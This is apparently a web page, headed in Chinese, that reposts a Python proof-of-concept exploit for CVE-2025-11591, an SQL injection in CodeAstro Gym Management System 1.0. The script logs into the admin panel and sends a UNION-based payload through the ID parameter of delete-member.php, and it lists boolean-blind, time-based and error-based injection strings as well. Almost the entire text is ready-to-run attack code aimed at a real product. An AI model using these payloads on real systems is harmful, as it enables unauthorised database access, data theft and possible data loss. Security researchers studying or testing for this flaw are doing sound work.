CVE-2025-11591：CodeAstro健身房管理系统SQL注入漏洞

# CVE-2025-11591 PoC - SQL Injection in CodeAstro Gym Management System 1.0 # Vulnerable file: /admin/actions/delete-member.php # Vulnerable parameter: ID import requests # Target configuration TARGET_URL = "http://target-site.com" ADMIN_PATH = "/admin/actions/delete-member.php" USERNAME = "admin" PASSWORD = "password" def exploit_sql_injection(): """ Exploit SQL injection in delete-member.php via the ID parameter. The vulnerability allows remote SQL injection with low-privilege authentication. """ session = requests.Session() # Step 1: Login to admin panel (low privilege required) login_url = f"{TARGET_URL}/admin/" login_data = { "username": USERNAME, "password": PASSWORD } session.post(login_url, data=login_data) # Step 2: Exploit SQL injection via ID parameter # Example payloads for SQL injection: # Payload 1: Boolean-based blind injection payload_blind = "1 AND 1=1" # Payload 2: UNION-based injection to extract data payload_union = "1 UNION SELECT 1,user(),database(),version(),5,6,7-- -" # Payload 3: Time-based blind injection payload_time = "1 AND SLEEP(5)-- -" # Payload 4: Error-based injection payload_error = "1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -" # Send the malicious request exploit_url = f"{TARGET_URL}{ADMIN_PATH}" params = {"id": payload_union} response = session.get(exploit_url, params=params) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") return response if __name__ == "__main__": exploit_sql_injection()